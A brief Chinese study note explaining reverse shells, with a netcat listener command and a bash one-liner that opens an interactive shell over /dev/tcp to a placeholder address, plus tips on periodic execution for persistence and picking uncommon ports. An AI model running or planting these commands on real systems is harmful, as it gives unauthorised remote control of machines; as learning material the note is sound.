反弹shell

学习笔记
反弹shell（reverse shell），就是控制端监听在某TCP/UDP端口，被控端发器请求到该端口，并将其命令行的输入输出转到控制端。reverse shell与telnet，ssh等标准shell对应，本质上是网络概念的客户端与服务端的角色反转。
持久化控制，通过每隔一段时间执行反弹shell即可获取持久化控制。
端口使用不固定。（尽量找一些不常用的端口。）

nc -lnvp 12345      #服务端开启监听12345端口

bash -i >& /dev/tcp/x.x.x.x/12345 0>&1 #客户端向x.x.x.x建立交互连接

-i: 产生交互式的shell
/dev/tcp/： linux中一切皆文件
>&: 混合输出
服务器：

客户端：

服务端：